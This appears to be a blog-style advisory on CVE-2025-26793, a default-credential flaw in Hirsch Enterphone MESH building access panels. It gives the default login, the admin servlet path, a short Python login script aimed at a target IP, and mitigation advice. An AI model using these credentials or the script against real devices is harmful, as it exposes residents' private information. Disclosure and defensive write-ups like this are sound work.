CVE-2025-26793 - Hirsch Enterphone MESH Default Credential Vulnerability Exposes Private Resident Information in Multiple Buildings

A recently discovered vulnerability, designated as CVE-2025-26793, has been found in the Web GUI configuration panel of the Enterphone MESH access control system. Manufactured by Hirsch (formerly Identiv and Viscount), the affected devices are shipped with default credentials that could be exploited by malicious actors, potentially gaining unauthorized access to private residents' personally identifiable information (PII). This post will provide an overview of the vulnerability, a code snippet demonstrating the exploit, and links to original references. Furthermore, the post discusses the respective roles of the supplier and system administrators in addressing this issue.

Vulnerability Overview

Enterphone MESH is a widely used access control system employed in dozens of Canadian and U.S. apartment buildings. The vulnerability lies in the fact that the device's Web GUI configuration panel ships with default credentials (username: freedom, password: viscount) and there are no prompts for the administrator to change these credentials during initial configuration. Consequently, an attacker may use these credentials remotely via mesh.webadmin.MESHAdminServlet to obtain unauthorized access to building residents' PII.

Original References

Further details about the vulnerability, along with the mitigation steps and background information, can be found at the following original sources:

- National Vulnerability Database (NVD) Entry
- Hirsch Security Advisory

This Python code snippet demonstrates how an attacker could potentially exploit the vulnerability

import requests

url = "http://<TARGET_IP>/mesh.webadmin.MESHAdminServlet";
credentials = {
    "username": "freedom",
    "password": "viscount",
    "login": "true"
}

response = requests.post(url, data=credentials)

if response.status_code == 200:
    print("[+] Successfully logged in.")
else:
    print("[-] Failed to log in.")

By replacing <TARGET_IP> with the IP address of the target device, the attacker could attempt to log in with the default credentials. If successful, the attacker would gain access to the device and the associated private resident information.

Supplier's Perspective

While the supplier acknowledges the existence of the vulnerability within their Enterphone MESH system, they emphasize that affected systems are not following the manufacturer's recommendation to change default passwords. Hirsch strongly encourages administrators to adhere to their recommended security practices, which include regularly updating system passwords and using unique, complex passwords for each installation.

Conclusion

The CVE-2025-26793 vulnerability demonstrates the importance of following manufacturers' recommendations and security best practices for access control systems in residential buildings. By regularly changing default passwords and employing unique, complex credentials, administrators can significantly reduce the likelihood of unauthorized access to private resident information.

Timeline

Published on: 02/15/2025 15:15:23 UTC
Last modified on: 02/24/2025 17:15:14 UTC